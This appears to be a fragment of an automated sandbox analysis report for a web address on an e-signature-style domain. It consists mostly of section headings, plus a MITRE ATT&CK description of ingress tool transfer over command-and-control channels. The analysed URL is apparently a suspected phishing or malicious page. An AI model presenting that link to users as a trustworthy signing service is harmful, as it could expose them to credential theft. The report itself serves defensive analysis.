Chrome Cache Entry: 71

Chrome Cache Entry: 72

Chrome Cache Entry: 73

Chrome Cache Entry: 74

Chrome Cache Entry: 75

Static File Info

Network Behavior

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Windows Analysis Report
https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre